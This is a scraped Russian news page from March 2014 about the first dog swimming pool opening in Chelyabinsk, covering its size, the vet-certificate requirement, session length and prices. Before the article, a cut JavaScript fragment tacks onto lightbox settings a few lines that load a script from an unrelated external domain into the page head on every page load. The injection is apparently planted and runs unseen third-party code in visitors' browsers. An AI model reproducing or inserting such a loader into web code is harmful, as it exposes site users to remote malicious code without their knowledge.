, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

В Челябинске готовится к открытию первый бассейн для собак

10 марта в областной столице откроется первый в городе водный комплекс для собак. Водные процедуры лучшие друзья человека будут принимать в бассейне размером 220 на 80 сантиметров и глубиной 120 сантиметров. Основными клиентами заведения должны стать собаки, восстанавливающиеся после травм. Пребывание в воде поможет животным поддерживать физическую форму и избавиться от стресса.

Для того чтобы попасть в бассейн, необходимо будет представить справку от ветеринара об отсутствии кожных заболеваний. Специфика процедуры состоит в том, что собака как бы плывет на месте. На нее надевается специальный жилет, который закрепляется специальными ремнями. Время сеанса варьируется от 5 до 20 минут в зависимости от физической формы животного. За процессом следит опытный инструктор.

Отметим, что цены в собачьем бассейне несколько выше, чем в обычном – человеческом. Стоимость одного занятия зависит от размера собаки и составляет от 500 до 700 рублей. Несмотря на это, на водные процедуры уже записаны четыре четвероногих клиента.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
16:57 - 06 марта 2014
|
автор: U-RSS
|
(442)
|
(0)

Комментарии (0)

Я человек
Я бот